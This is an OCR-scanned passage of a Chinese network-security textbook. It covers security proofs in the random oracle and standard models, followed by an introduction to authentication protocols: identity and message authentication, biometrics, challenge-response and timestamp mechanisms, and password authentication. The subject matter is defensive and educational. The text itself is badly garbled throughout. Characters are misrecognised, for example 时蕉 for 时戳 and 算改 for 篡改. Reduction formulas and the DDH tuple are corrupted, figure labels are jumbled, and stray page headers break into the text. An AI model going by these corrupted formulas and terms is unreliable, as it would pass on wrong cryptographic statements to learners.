者 A 可 以 攻破 目标 密码 体制 , 则 可 以 设计 一 个 模拟 算法 M, 将 A 攻破 目标 密码 体制 的 能 力 
变换 为 M 解决 难 解 问题 的 能 力 , 这 种 变换 就 是 归 约 。 由 于 已 知 的 难 解 问题 是 公认 的 PPT 
(Probabilistic Polynomial-time) 时 间 内 不 可 解 的 ,因此 得 出 假设 的 前 提 是 错误 的 , 即 : 不 存 
在 有 效 地 对 目标 密码 体制 的 攻击 者 A, 也 就 是 说 目标 密 体制 是 安全 的 。 

在 随机 预言 机 模型 下 证 明 密码 体制 安全 性 的 方法 可 用 图 6. 11 来 说 明 。 在 真实 攻击 游 
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秦 于 案例 的 网 络 安全 技术 与 实践 


戏 协议 中 ,攻击 者 A 可 以 获得 对 加 密 、 解 密 及 随机 预言 机 的 访问 。 而 在 仿真 的 情形 下 ,模拟 
算法 M 仿真 了 所 有 的 预言 机 服务 , 且 真 实 环境 和 仿真 环境 是 多 项 式 不 可 区 分 的 。 正 因为 A 
无 法 区 分 真实 环境 和 仿真 环境 , 它 才 能 充分 发 挥 它 的 攻击 能 力 。 

加 密 方案 和 公 钥 


加 密 方案 和 公 钥 yf) 
解密 Oracle 服 务 | 解密 服务 | 1 
mo, m1 
~ mo m1 Cc 
| A 窗 : M 
解密 服务 
sd) 有 根据 的 
有 根据 的 猜测 猜测 
人 
仿真 随机 预言 | 
随机 预言 机 二 三 Oo) 
(a) 真实 的 情形 (b) 仿真 的 情形 


6.11 RO 模型 下 加 密 方案 的 安全 性 证 明 


以 图 6. 11 (b) 为 例 ,假定 M 得 到 一 个 难 解 问题 y= f(x), 其 中 是 一 个 单 向 或 单 向 陷 
门 函 数 ,A 具有 攻破 基于 上 述 难 解 问 题 设计 的 目标 密码 体制 的 能 力 ,M 试图 利用 A 构造 一 
个 算法 ,求解 z= 二 f(y)。 车 目标 密码 体制 的 安全 确实 可 以 归 约 到 f(z) 求 道 的 问题 , 则 理论 
上 就 可 以 构造 一 个 仿真 算法 M, 能 解决 f(z) 求 逆 的 问题 。 反 之 , 则 无 法 证 明 目 标 密码 体制 
是 安全 的 。 

Bellare 和 Rogaway 利用 这 种 思想 ,分别 给 出 RO 模型 下 签名 体制 .加 密 体制 的 几 个 设 
计 范 例 。 其 中 ,通过 对 IND-CPA 安全 的 密码 体制 增加 对 密 文 的 校 验 机 制 以 达到 IND-CCA 
安全 性 的 思想 被 广泛 接受 ,并且 被 用 于 设计 新 的 能 达到 IND-CCA 安全 性 的 密码 体制 。 


6.6.3 标准 模型 下 的 安全 性 证 明 


RO 模型 下 的 安全 性 证 明 有 一 定 的 理论 和 实用 价值 ,但 也 存在 一 些 争 议 。 如 Canetti、 
Goldreich Halevi 等 就 对 ROM 安全 性 证 明 持 相当 否定 的 态度 ,但 对 于 RO 模型 下 的 安全 性 
的 具体 意见 却 不 一 致 。Canetti 认为 这 是 一 个 糟糕 的 抽象 概念 ,导致 了 归 约 到 困难 问题 的 丧 
失 。 而 Goldreich 则 认为 它 是 不 完全 的 : 在 随机 预言 机 实例 中 可 能 无 法 排除 因为 某 些 缺 陷 
造成 的 不 安全 性 。Halevi 评价 则 是 : 这 个 方案 的 暂时 成 功 完全 是 因为 运气 。 但 又 说 ,“ 今 天 
的 标准 应 该 在 具有 ROM 证 明 的 方案 之 中 ,而 不 是 在 那些 不 具有 这 些 证 明 的 方案 之 中 (至 少 
应 该 在 RO 模型 中 证 明 )”。 他 们 指出 ,在 RO 模型 证 明 的 安全 并 不 意味 着 在 现实 世界 也 是 
安全 的 。 因 此 ,在 标准 模型 下 设计 和 分 析 密 码 协议 仍然 是 十 分 重要 的 。 标 准 模型 下 安全 性 
证 明 的 过 程 如 图 6.12 所 示 。 

在 标准 模型 下 的 安全 性 证 明 与 RO 模型 下 的 安全 性 证 明 思想 是 一 致 的 ,不 同 的 是 ,标准 
模型 下 不 再 把 哈 希 函数 理想 化 成 随机 预言 机 。 在 标准 模型 下 设计 密码 体制 时 , 仍 可 使 用 哈 
希 函 数 , 但 仅仅 利用 了 其 单 向 性 ,以 获取 输入 值 的 数字 指纹 或 使 输出 映射 到 某 个 定 长 的 
空间 。 


以 图 6. 12 以 例 , 设 目标 密码 体制 是 基于 DDH(Decisional Diffie-Hellman) 难 解 问题 的 。 
假定 攻击 者 A 具有 攻破 目标 密码 体制 的 能 力 ,M 得 到 一 个 DDH 问题 (si ,gz ,xz ,xz),M 试 
图 利用 A 构造 一 个 算法 ,回答 (gi ,gs ,za zz) 是 否 是 一 个 DH 四 元 组 的 问题 。M 巧妙 地 利 
用 四 元 组 (gi ,gz ,za ,zz ) 仿 真一 个 目标 密码 体制 ,这 个 仿真 的 密码 体制 与 真实 的 密码 体制 是 
概率 多 项 式 时间 不 可 区 分 的 ,因此 A 不 可 能 觉察 到 任何 不 同 ,因而 也 能 够 充分 发 挥 A 的 攻 
击 能 力 。M 将 A 对 目标 密码 体制 的 攻击 变换 到 对 DDH 问题 的 求解 , 若 A 能 攻破 目标 密码 
体制 , 则 M 可 以 解决 DDH 问题 。 由 于 DDH 问题 是 一 个 公认 的 难 解 问题 ,因此 只 要 证 明 的 
过 程 没有 错误 ,就 可 以 认为 假设 的 前 提 一 一 “存在 攻破 目标 密码 体制 的 攻击 者 A” 一 一 不 成 
立 , 从 而 证 明了 目标 密码 体制 的 安全 性 。 


加 密 方案 和 公 角 加 密 方案 和 公 钥 


B82 UU 


解密 服务 
mo, m1 
c 
解密 服务 | M 
有 根据 的 
猜测 


解密 Oracle 服 务 


> 


解密 Oracle 服 务 
有 根据 的 猜测 


仿真 随机 预言 ENO 


(a) 真实 的 情形 (b) 仿真 的 情形 
图 6.12 标准 模型 下 加 密 方案 的 安全 性 证 明 
6.7 小 结 


本 章 给 出 了 安全 协议 的 基本 定义 、 目 的 、 分 类 ,并 通过 图 表 的 形式 生动 的 给 出 安全 协议 
的 模型 与 方法 ,研究 层次 与 设计 原则 ,最 后 给 出 安全 协议 的 可 证 明理 论 的 形式 化 证 明 方 法 。 


6.8 习 题 
1. 说 明 安 全 协议 的 定义 。 
2. 说 明 安全 协议 的 设计 原则 。 
3. 说 明 公 钥 加 密 方案 各 种 安全 性 概念 之 间 的 关系 。 
4. 说 明 安全 协议 的 主要 目标 。 
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第 7 章 基本 安全 协议 


信息 网 络 上 主要 有 3 大 方面 需要 保护 : 起 点 传输 过 程 及 终点 。 最 新 的 安全 措施 

(加 密 技术 、 基 于 信用 卡 的 网 上 支付 协议 .PGE、PINs 等 ) 却 都 集中 指向 最 不 可 能 发 生 诈 
骗 的 环节 , 即 信 息 传 输 。 

一 网络 名 言 


7.1 认证 协议 


基本 安全 协议 是 构造 复杂 安全 协议 的 基石 ,是 网 络 安 全 的 一 个 重要 组 成 部 分 。 限 于 篇 
幅 , 本 章 主要 重点 介绍 认证 协议 、 密 钥 交换 协议 以 及 认证 及 密 钥 交换 协议 。 其 中 ,认证 协议 
可 分 为 基于 CA(Certificate Authority ,证书 授权 中 心 ) 的 认证 和 非 基于 CA 的 认证 ; 认证 及 
密 钥 交换 协议 可 分 为 基于 口令 和 基于 身份 两 个 分 支 。 最 后 ,作为 这 些 基 本 内 容 的 应 用 ,结合 
数学 算法 ,给 出 5 种 不 同 环境 的 应 用 实例 。 
7.1.1 认证 :通信 前 的 首要 问题 

安全 认证 的 概念 可 以 细 分 为 如 下 3 个 方面 : 数据 源 认 证 、 实 体 认 证 及 认证 的 密 钥 建立 。 

认证 的 目的 有 3 个 : 一 是 消息 (完整 性 ) 认 证 , 即 验证 信息 在 传送 或 存储 过 程 中 是 否 被 
算 改 ; 二 是 身份 认证 , 即 验证 消息 的 收发 者 是 否 持 有 正确 的 身份 认证 符 , 如 口令 或 密 钥 等 ; 
三 是 消息 的 序号 和 操作 时 间 ( 时 间 性 ) 等 的 认证 ,其 目的 是 防止 消息 重 放 或 延迟 等 攻击 。 认 
证 技术 是 防止 不 法 分 子 对 信息 系统 进行 主动 攻击 的 一 种 重要 技术 。 加 密 和 认证 同 是 信息 系 
统 安全 的 两 个 重要 方面 ,但 它们 不 能 相互 替代 。 认 证 不 能 自动 地 提供 加 密 功能 ,而 加 密 也 不 
能 自然 地 提供 认证 功能 。 

认证 技术 一 般 可 以 分 为 3 个 层次 : 安全 管理 协议 、 认 证 体制 和 密码 体制 。 安 全 管理 协 
议 的 主要 任务 是 在 安全 体制 的 支持 下 ,建立 ` 强 化 和 实施 整个 网 络 系统 的 安全 策略 ; 认证 体 
制 在 安全 管理 协议 的 控制 和 密码 体制 的 支持 下 ,完成 各 种 认证 功能 ; 密码 体制 是 认证 技术 
的 基础 , 它 为 认证 体制 提供 数学 方法 支持 。 

一 个 安全 的 认证 体制 至 少 应 该 满足 以 下 要 求 

(1) 接收 者 能 够 检验 和 证 实 消息 的 合法 性 真实 性 和 完整 性 。 

(2) 消息 的 发 送 者 对 所 发 的 消息 不 能 抵赖 ,有 时 也 要 求 消 息 的 接收 者 不 能 否认 收 到 的 
消息 。 


(3) 除了 合法 的 消息 发 送 者 外 ,其 他 人 不 能 伪造 发 送 消息 。 

认证 体制 中 通常 存在 一 个 可 信 中 心 或 可 信 第 三 方 ( 如 认证 机 构 CA) ,用 于 仲裁 ,颁发 证 
书 或 管理 某 些 机 密 信 息 。 通 过 数字 证 书 实现 公 钥 的 分 配 和 身份 的 认证 。 

数字 证 书 是 标志 通信 各 方 身 份 的 数据 ,是 一 种 安全 分 发 公 钥 的 方式 。CA 负责 密 钥 的 
发 放 ,注销 及 验证 ,所 以 CA 也 称 密 钥 管理 中 心 。CA 为 每 个 申请 公开 密 钥 的 用 户 发 放 一 个 
证 书 ,证 明 该 用 户 拥 有 证 书 中 列 出 的 公 钥 。CA 的 数字 签名 保证 不 能 伪造 和 算 改 该 证 书 , 因 
此 ,数字 证 书 既 能 分 配 公 钥 ,又 实现 了 身份 认证 。 

安全 认证 的 概念 可 以 细 分 为 如 下 3 个 方面 : 数据 源 认证 ,实体 认 证 及 认证 的 密 钥 建立 。 

(1) 数据 源 认证 : 数据 源 认证 包含 从 某 个 声称 的 源 ( 发 送 者 ) 到 接收 者 的 消息 传输 过 
程 ,该 接收 者 在 接收 时 验证 消息 以 确认 消息 发 送 者 的 身份 、 原 消息 的 完整 性 以 及 消息 传输 的 
活 现 性 。 

(2) 实体 认证 : 实体 认证 是 一 个 通信 过 程 ,通过 这 个 过 程 某 个 实体 和 另外 一 个 实体 建 
立 一 种 真实 通信 ,并 且 第 二 主体 所 声称 的 身份 应 和 第 一 主体 所 寻求 的 通信 方 一 致 。 

(3) 认证 的 密 钥 建立 : 认证 的 密 钥 建立 是 认证 协议 和 和 密 钥 建立 协议 的 结合 ,用 于 确认 
协议 参与 实体 身份 ,并 在 实体 之 间 建 立 共 享 秘密 以 保证 上 层 的 安全 通信 。 

依照 不 同 的 分 类 标准 ,认证 协议 可 以 分 为 不 同 的 类 型 。 根 据 认证 实体 的 不 同 地 位 ,可 将 
协议 分 为 以 下 几 类 。 

(1) 客户 -服务 器 类 型 : 认证 的 参与 者 具有 不 对 等 的 地 位 ,其 中 一 个 认证 实体 (客户 ) 向 
另 一 个 认证 实体 (服务 器 ) 请 求 某 种 服务 。 两 个 认证 实体 可 以 通过 非 密码 方法 预先 共享 某 些 
秘密 。 

(2) 客户 -客户 类 型 : 认证 实体 具有 对 等 的 地 位 ,希望 通过 认证 建立 某 种 联系 。 

(3) 成 员 -俱乐部 类 型 : 成 员 向 俱乐部 证 明 其 身份 的 有 效 性 ,俱乐部 只 需要 考虑 成 员 证 
件 的 有 效 性 ,而 不 必 知 道成 员 的 进一步 信息 。 

1. 身份 认证 技术 

1) 身份 认证 的 基本 概念 

身份 认证 (Identification) 是 用 户 向 系统 出 示 自 己 身份 证 明 的 过 程 ,又 是 系统 查核 用 户 
身份 证 明 的 过 程 。 这 两 个 过 程 是 判明 和 确认 通信 双方 真实 身份 的 两 个 重要 环节 ,人 们 常 把 
这 两 项 工作 统称 为 身份 认证 或 身份 鉴别 。 

进一步 理解 ,认证 ,授权 与 访问 控制 3 个 概念 相 结 合 构成 身份 的 概念 。 认 证 是 指 验 证 用 
户 或 设备 所 声称 身份 是 否 有 效 的 过 程 ; 授权 是 赋予 用 户 、 用 户 组 特定 系统 访问 权限 的 过 程 ; 
访问 控制 指 把 来 自 系统 资源 的 信息 流 限制 到 网 络 中 被 授权 的 人 或 系统 。 授 权 和 访问 大 多 数 
情况 下 都 是 在 成 功 的 认证 之 后 进行 。 

可 见 身份 认证 机 制 是 安全 系统 中 的 基础 设施 ,是 最 基本 的 安全 服务 , 它 是 外 界 进入 安全 
系统 的 第 一 道 屏障 ,其 他 的 安全 服务 都 依赖 于 它 。 如 果 身 份 认 证 出 了 问题 ,其 他 的 安全 服务 
也 将 功 亏 一 溃 。 

2) 认证 技术 分 类 

如 表 7.1 所 示 , 从 不 同 的 角度 ,可 以 对 常用 的 身份 认证 技术 进行 分 类 。 
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表 7.1 几 种 流行 的 认证 方式 


认证 技术 使 用 要 素 认证 方式 举 例 
基于 口令 字 的 验证 What you know? 日 令 用 户 名 /密码 动态 口令 
基于 物理 设备 的 认证 What you are? 物理 设备 IC 卡 . 加 密 狗 等 
基于 生物 特征 的 识别 Who you are? 人 体 生 物 特 征 指纹 ,虹膜 、 声 纹 等 
基于 加 密 技术 的 认证 What you know? 密码 学 技术 共享 密 钥 ,数字 签名 
多 因素 认证 多 种 结合 多 因素 结合 双 因 子 认证 如 USB Key 
PKI 认 证 公 钥 技术 PKI 技 术 数字 签名 ,数字 信封 等 
生物 技术 与 智能 卡 相 结合 ”多 种 结合 双 因 子 指纹 与 智能 卡 相 结合 
基于 地 址 的 认证 Where you are? 地 址 认证 协议 IP 认证 、 端 口 认证 


(1) 基于 秘密 知识 的 认证 、 基 于 物品 的 认证 、 基 于 生物 特征 的 认证 和 基于 地 址 的 认证 : 
这 种 划分 也 是 从 用 户 使 用 认证 系统 的 方式 角度 来 说 的 。 基 于 秘密 知识 的 认证 基于 “你 知道 
什么 ”What you know)。 这 里 的 用 户 名 /口令 认证 应 该 理解 为 一 切 基于 各 种 密码 算法 的 软 
件 认 证 方式 ,基于 某 种 物品 的 认证 方法 基于 “你 拥有 什么 ”What you have) ,第 三 种 基于 生 
物 特征 的 认证 方法 基于 “你 是 什么 "(Who you are) ,第 四 种 基于 地 址 的 认证 方法 基于 你 的 
IP 地 址 和 端口 (Where you are)。 

(2) 静态 认证 与 动态 认证 : 这 种 划分 基于 认证 过 程 中 被 验证 的 一 方 的 认证 信息 是 否 动 
态 变化 ,是 从 认证 方法 的 设计 角度 来 说 的 。 认 证 信息 根据 被 认证 者 某 些 具有 唯一 性 的 信息 
生成 的 , 它 可 以 是 你 唯一 知道 的 或 唯一 拥有 的 (例如 所 拥有 的 物品 或 者 生物 特征 ) 等 。 在 每 
一 次 的 身份 认证 过 程 中 被 认证 者 向 认证 者 提供 的 认证 信息 是 静态 的 ,不 变化 的 。 

(3) 静态 口令 认证 与 动态 口令 认证 : 这 种 划分 是 基于 用 户 在 使 用 认证 系统 时 每 次 输入 
的 口令 是 否 动态 变化 ,是 从 用 户 使 用 认证 系统 的 角度 来 说 的 。 

(4) 单 因子 认证 、 双 因子 认证 和 多 因子 认证 : 认证 因子 是 指 所 有 可 用 于 身份 认证 的 要 
素 的 集合 。 常 用 的 认证 因子 比如 PIN 码 、 密 码 、 响 应 记号 (挑战 /应 答 记 号 , challenge- 
response tokens) 智能卡、 生物 学 特征 等 。 

(5) 其 他 划分 方法 : 从 认证 所 采用 的 密码 算法 角度 ,可 以 分 为 基于 对 称 密 钥 算法 的 认 
证 方式 .基于 公开 密 钥 算法 的 认证 方式 和 基于 Hash 算法 的 认证 方式 。 实 用 的 安全 身份 认 
证 系统 往往 是 多 种 密码 算法 的 混合 系统 ; 还 可 以 从 是 否 需 要 可 信 第 三 方 的 角度 划分 。 另 
外 ,按照 对 象 的 不 同 来 认证 的 方法 总 结 如 图 7. 1 所 示 。 

3) 身份 认证 实例 

(1) 智能 卡 身份 认证 。 

智能 卡 (Smart Card) 是 IC 卡 的 一 种 。 它 是 一 种 内 含 了 集成 电路 芯片 的 塑料 卡片 ,本身 
有 一 定 的 存储 能 力 和 计算 能 力 , 可 以 以 适当 的 方式 进行 读 写 。 目 前 在 通信 ,金融 \ 医 疗 等 各 
个 方面 ,智能 卡 都 有 比较 广泛 的 应 用 。 在 金融 领域 中 ,用 智能 卡 代 替 现 有 的 磁卡 , 既 提 高 了 
安全 性 ,又 能 在 一 张 智 能 卡 上 追加 各 种 业务 ,可 以 作为 现金 卡 、 信 用 卡 .证券 卡 等 。 在 通信 和 领 
域 , 智 能 卡 主要 应 用 于 移动 电话 和 公用 电话 。 目 前 ,在 GSM 手机 中 已 大 量 使 用 了 SIM 
(Subscriber Identify Module) 卡 ,用 以 标识 单个 用 户 。 下 面 对 智 能 卡 的 基本 原理 和 其 在 认 
证 方面 的 应 用 作 简 单 介 绍 。 智 能 卡 中 封装 了 微 处 理 器 芯片 (CPU) ,这 样 EEPROM 的 数据 
接口 在 任何 情况 下 都 不 会 与 IC 卡 的 对 外 数据 线 相连 接 ,智能 卡 就 具备 了 数据 安全 性 保护 措 


施 , 而 CPU 芯片 在 具有 数据 判断 能 力 的 同时 ,也 具备 了 数据 分 析 处 理 能 力 , 因 此 智能 卡 可 
以 区 别 合法 和 非法 读 写 设 备 ,还 可 以 对 数据 进行 加 密 和 解密 处 理 。 目 前 ,DES 算法 、RSA 算 
法 等 都 能 被 智能 卡 支持 。Gemplu 公司 的 GPK 卡 、Schlumberger 公司 的 CryptoFlex 都 是 
集成 高 性 能 算法 的 典型 智能 卡 。 


MAC( 消 息 认证 ) 
散 列 函数 (Hash Functions) 
利用 对 称 加 密 的 认证 (共享 密 钥 ) 
Wi 只 有 发 送 方 和 接收 方 有 共享 密 钥 
数字 签名 (Digital Signature) 
附加 信息 来 验证 消息 
What you know( 你 知道 什么 )? 
密码 口令、 妈妈 的 生日 .机密 问题 
人 机 What you have( 你 有 什么 )? 
钥匙 IC 卡 、 令 牌 . 身 份 证 
What you are( 你 是 什么 )? 
实体 手 型 .指纹 . 眼 纹 . 声 纹 .说话 方式 ,行走 方式 
挑战 /应 答 (C/R) 
对 象 | C-L、SCHNORR Signature 
CAA 
7.1 按照 对 象 的 不 同 的 认证 分 类 方法 


(2) 生物 特征 识别 技术 。 

生物 特征 识别 技术 (Biometric Identification Technology) 是 利用 人 类 自身 的 生理 行为 
特征 进行 身份 识别 的 一 种 技术 。 生 物 特征 具有 稳定 性 \ 唯 一 性 、 方 便 性 ,不易 遗忘 等 特点 ,一 
般 可 用 于 身份 识别 的 特征 有 指纹 、 面 相 、 虹 膜 、 掌 纹 、 声 音 、 视 网 腊 和 DNA 等 人 体 的 生理 特 
征 , 以 及 签名 的 动作 、 行 走 的 步 态 . 敲 击 键盘 的 力度 等 行为 特征 。 

不 同 的 生物 识别 认证 的 原理 大 臻 相同, 一般 的 结构 如 图 7. 2 所 示 。 模 板 数据 库 中 存放 
了 被 认证 方 的 特征 数据 。 用 户 登 录 时 ,由 传感器 对 用 户 的 特征 进行 采集 、 量 化 ,通过 特征 提 
取 模块 提取 用 户 的 特征 码 ,再 与 模板 数据 库 中 存放 的 掌 纹 数据 以 某 种 算法 进行 比较 ,如 果 相 
符 , 则 认证 通过 。 


= 
及 ve 
传感器 上 一 ~- 生物 特征 提取 模块 厂 一 | 特征 匹配 模块 
| 十 位 届 : 
Le 


生物 特征 读 取 系统 
图 7.2 生物 特征 认证 结构 


目前 许多 高 科技 公司 正在 试图 用 生物 特征 识别 来 取代 人 们 手中 的 信用 卡 或 密码 ,并 且 
在 机 场 .银行 等 场所 进行 了 应 用 。 生 物 特征 识别 的 优点 : 不 易 遗 忘 ,不 易 丢 失 ; 防伪 性 能 
好 ,不 易 伪造 ; 使 用 方便 ,“ 随 身 携带 ”, 随 时 随地 都 可 以 使 用 。 制 约 因 素 : 技术 不 成 熟 , 在 模 
式 匹配 时 ,如 何 判断 提取 的 数据 与 保存 的 用 户 数据 相 匹配 是 一 大 难题 ; 数据 采集 时 ,需要 专 
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门 的 硬件 ,造价 比较 贵 ; 数据 录入 比较 麻烦 ; 某 些 身 份 特征 仍然 可 以 伪造 ,存在 重 放 攻击 ; 
生物 特征 稳定 性 ,如 人 的 表情 ,不 同 角 度 进行 提取 时 ,可 能 会 不 同 ; 由 于 算法 的 复杂 度 问 题 ， 
造成 匹配 的 速度 比较 慢 ,会 限制 其 应 用 。 

2. 消息 认证 技术 

消息 认证 是 指 通过 对 消息 或 消息 相关 信息 进行 加 密 或 签名 变换 进行 的 认证 ,目的 是 为 
防止 传输 和 存储 的 消息 被 有 意 或 无 意 地 自 改 ,包括 消息 内 容 认 证 ( 即 消息 完整 性 认证 ) 消息 
的 源 和 宿 认 证 ( 即 身份 认证 ) 及 消息 的 序号 和 操作 时 间 认 证 等 。 

消息 认证 所 用 的 摘要 算法 与 一 般 的 对 称 或 非 对 称 加 密 算法 不 同 , 它 并 不 用 于 防止 信息 
被 窃取 ,而 是 用 于 证 明 原 文 的 完整 性 和 准确 性 。 也 就 是 说 ,消息 认证 主要 用 于 防止 信息 被 算 
改 , 如 表 7.2 所 示 。 


表 7.2 几 种 识别 方式 的 比较 
生物 特征 。 普遍 性 独特 性 稳定 性 ”可 采集 性 性 能 
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人 脸 高 低 中 高 低 高 低 
指纹 中 高 高 中 高 中 高 
手 形 中 中 中 高 高 高 高 
虹膜 高 高 高 中 高 低 高 
掌 纹 高 高 中 低 高 低 高 
签名 低 低 低 高 低 高 低 
声音 中 低 低 中 低 高 低 
1) 消息 内 容 认 证 


消息 内 容 认证 常用 的 方法 是 : 消息 发 送 者 在 消息 中 加 入 一 个 鉴别 码 ( 消 息 认 证 码 
MAC. 自 改 检测 码 MDC 等 ) 并 经 加 密 后 发 送 给 接收 者 (有 时 只 需 加 密 鉴 别 码 即 可 )。 接 收 
者 利用 约定 的 算法 对 解密 后 的 消息 进行 鉴别 运算 ,将 得 到 的 鉴别 码 与 收 到 的 鉴别 码 进行 比 
较 , 若 二 者 相等 , 则 接收 ,否则 拒绝 接收 。 

2) 源 和 宿 的 认证 

一 种 方法 是 通信 双方 事先 约定 发 送 消息 的 数据 加 密 密 钥 ,接收 者 只 需 证 实 发 送 来 的 消 
息 是 否 能 用 该 密 钥 还 原 成 明文 就 能 鉴定 发 送 者 。 如 果 双 方 使 用 同一 个 数据 加 密 密 钥 ,那么 
只 需 在 消息 中 嵌入 发 送 者 的 识别 符 即 可 。 另 一 种 方法 是 通信 双方 事先 约定 各 自发 送 消息 所 
使 用 的 口令 ,发 送 消息 中 含有 此 口令 并 进行 加 密 ,接收 者 只 需 判 别 消息 中 解密 的 口令 是 否 等 
于 约定 的 口令 就 能 鉴定 发 送 者 。 为 安全 起 见 , 口 令 应 该 是 可 变 的 。 

3) 消息 序号 和 操作 时 间 的 认证 

消息 的 序号 和 时 间 性 的 认证 主要 是 阻止 消息 的 重 放 攻击 。 常 用 的 方法 有 : 消息 的 流水 
作业 号 .链接 认证 符 、 随 机 数 认证 法 和 时 戳 等 。 

3. 数字 签名 与 消息 认证 

从 某 种 意义 上 说 ,消息 认证 类 似 于 数字 签名 。 二 者 的 不 同 之 处 在 于 消息 认证 系统 不 要 
求 第 三 方 (可 能 是 不 诚实 的 ) 验 证 由 指定 用 户 生 成 的 认证 标签 的 有 效 性 ,而 数字 签名 系统 要 
求 第 三 方 可 以 校 验 其 他 用 户 生 成 的 签名 的 有 效 性 。 因 此 ,数字 签名 为 消息 认证 问题 提供 了 
一 种 解决 方案 。 另 一 方面 ,消息 认证 机 制 并 不 一 定 会 构成 数字 签名 机 制 。 


7.1.2 认证 协议 的 基本 技术 


根据 不 同 的 应 用 要 求 , 认 证 协议 呈现 不 同 的 形态 。 但 认证 协议 所 采用 的 技术 ,尤其 是 被 
认为 好 的 认证 技术 却 是 有 限 的 ,其 中 包含 的 思想 也 比较 简单 。 

首先 给 出 一 些 关 于 协议 描述 符号 的 约定 。 

。 Alice,Bob,…: 协议 参与 主体 名 称 , 有 时 简称 为 A,B,…。 

。A-~~B: M: A 给 B 发 送 消息 M。 

。 Kas : 主体 A 与 B 的 共享 密 钥 。 

。 Siga {M) : 主体 A 对 消息 M 产生 的 签名 。 

。 Nx: 主体 X 产生 的 随机 数 ,这 些 随机 数 是 从 一 个 足够 大 的 空间 中 随机 抽样 得 到 的 。 

。 ttx: 主体 X 产 生 的 时 惟 。 

1. 挑战 -应 答 机 制 

在 询问 -应 答 机 制 中 ,Alice 向 Bob 提出 一 个 随机 数 作为 询问 ,Bob 利用 能 够 证 明 其 身份 
的 密 钥 对 这 个 随机 数 进行 相应 运算 ,给 出 对 Alice 询问 的 密码 学 应 答 。 当 Bob 采取 对 称 密 
钥 时 ,询问 -应 答 机 制 描述 如 下 : 

A 一 B: Na; 

BA: Fr {M,Na}; 


接受 ”如果 NA 以 正确 的 形式 出 现 
A 验证 来 自 B 的 密 文 分 组 并 
拒绝 其 他 


在 产生 应 答 时 , Bob 可 以 采用 对 称 加 密 算法 或 消息 认证 码 (MAC) 作 为 F(。)。 当 
F(。) 采 用 对 称 加 密 算法 时 ,国际 标准 化 组 织 与 国际 电子 协会 (ISO/IEC) 将 此 时 的 挑战 -应 
答 机 制 标准 化 为 "ISO 两 次 传输 单方 认证 协议 ”。 采 用 MAC 函数 的 挑战 -应 答 机 制 被 标准 
化 为 “使 用 密码 验证 函数 的 ISO 两 次 传输 单方 认证 协议 ”。 

基于 公 钥 密码 体制 的 挑战 -应 答 机 制 如 下 : 

A—B: Na; 

BA: Siga {M,Na}; 


接受 ”如 果 通 过 了 签名 验证 
和 使 用 好 的 一 次 性 随机 数 验 证 签名 并 | 
拒绝 其 他 


ISO 将 上 述 挑 战 -应 答 机 制 标准 化 为 “使 用 公 钥 的 ISO 两 次 传输 单方 认证 机 制 ”。 

2. 时 蕉 /序列 号 机 制 

应 用 挑战 -应 答 机 制 实现 单方 认证 需要 进行 两 次 交互 ,为 了 减少 交互 次 数 , 可 以 采用 时 
铃 / 序 列 号 机 制 。 对 称 密码 体制 中 的 时 截 机 制 描述 如 下 : 

A 一 B: Fr {M ,tta}; 


接受 ”如果 tis 是 有 效 的 并 且 以 正确 的 形式 出 现 
B 验证 来 自 A 的 密 文 分 组 并 


上 述 机 制 中 的 密码 算法 F(。) 依 然 可 以 采用 对 称 加 密 算法 或 MAC 函数 。 前 一 种 情况 
被 标准 化 为 “ISO 对 称 密 钥 一 次 传输 单方 认证 协议 ”, 后 一 种 情况 被 标准 化 为 “使 用 密码 验证 
函数 的 ISO 一 次 传输 单方 认证 ”。 


基 术 人 安 会 碎 议 


贡 站 


基于 案例 的 网 络 安 会 鞭 术 与 实践 


公 钥 密码 体制 中 的 时 戳 机 制 描述 如 下 : 
A—>B: Siga{M,tta}; 
接受 ”如 果 通 过 了 签名 验证 且 zta 是 有 效 的 


拒绝 其 他 

该 机 制 被 标准 化 为 “ISO 公 钥 一 次 传输 单方 认证 协议 ”。 

在 ISO 的 标准 化 机 制 中 ,也 可 以 采用 序列 号 Ss 替代 时 蕉 tz ,序列 号 机 制 要 求 通信 双 
方 维护 某 个 状态 同步 的 Ss , 且 这 个 序列 号 应 以 双方 知道 的 方式 递增 ,但 是 在 开放 系统 中 ， 
一 个 主体 和 所 有 其 他 通信 主体 维护 具有 同步 状态 的 序列 号 比较 困难 ,因此 序列 号 机 制 较 少 
应 用 于 实际 认证 协议 中 。 

3. Diffie-Hellman 密 钥 协商 

1976 年 ,Diffie 和 Hellman 在 他 们 的 经 典 著作 (密码 学 的 新 方向 ) 中 提出 了 一 种 在 不 安 
全 信道 上 安全 地 协商 会 话 密 钥 的 方法 ,该 方法 后 来 被 称 作 Diffie-Hellman 密 钥 协商 ,简称 
DH 密 钥 协商 。DH 密 钥 协商 是 公 钥 密码 学 的 基础 ,是 密码 学 研究 从 传统 走向 现代 一 个 里 
程 碑 式 的 标志 (请 参阅 4. 3. 2 节 ) 。 

4. 基于 口令 的 认证 

基于 口令 的 认证 技术 起 源 于 20 世纪 70 年 代 初 ,该 认证 技术 的 基本 思想 是 : 用 户 Alice 
具有 一 个 口令 Pa ,服务 器 保留 了 形 如 (Alice, PaA) 的 记录 。 当 Alice 登录 服务 器 时 ,以 某 种 
形式 递交 P ,服务 器 检查 本 地 是 否 保存 了 相应 的 (Alice, PaA) 项 : 车 有 , 则 授权 Alice 的 登 
录 ; 否则 拒绝 。 由 于 目前 的 网 络 已 经 从 最 初 的 安全 专线 网 络 发 展 成 为 开放 网 络 , 基 于 口令 
的 认证 技术 越 来 越 类 似 于 对 称 密 钥 情 形 下 的 认证 ,用 户口 令 相 当 于 一 个 长 度 较 短 的 密 钥 。 


7.1.3 常规 认证 协议 


从 用 户 的 识别 和 认证 .通信 与 数据 的 完整 性 等 需求 角度 观察 ,对 于 P2P、C/S 模式 等 环 
境 下 的 认证 ,可 以 简要 概括 为 两 方面 : 基于 CA 认证 和 非 基 于 CA 认证 。 

1. 基于 CA 认证 

C/S 模式 过 于 依赖 基于 认证 服务 器 CA 的 认证 方法 。 而 在 P2P 网 络 中 ,节点 即 可 兼 具 
Client 和 Server 的 双重 身份 。 因 此 ,目前 P2P 网 络 中 许多 认证 方法 仍然 基于 CA 思想 。 

(1) 使 用 传统 的 PKI 技术 ,基于 CA 的 认证 方案 。 在 PKI 中 ,为 了 确保 用 户 及 其 所 持 有 
密 钥 的 正确 性 ,公共 密 钥 系统 需要 一 个 值得 信赖 而 且 独 立 的 第 三 方 机 构 充 当 认 证 中 心 
